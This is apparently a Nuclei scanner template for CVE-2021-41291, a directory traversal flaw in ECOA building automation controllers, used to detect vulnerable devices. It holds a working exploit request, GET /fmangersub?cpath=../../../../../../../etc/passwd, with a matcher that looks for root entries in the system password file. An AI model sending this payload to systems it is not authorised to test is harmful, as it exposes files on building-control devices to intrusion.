id: CVE-2021-41291

info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  impact: |
    An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
    - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41291
    cwe-id: CWE-22
    epss-score: 0.03741
    epss-percentile: 0.90901
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve2021,cve,ecoa,lfi,traversal

http:
  - raw:
      - |
        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950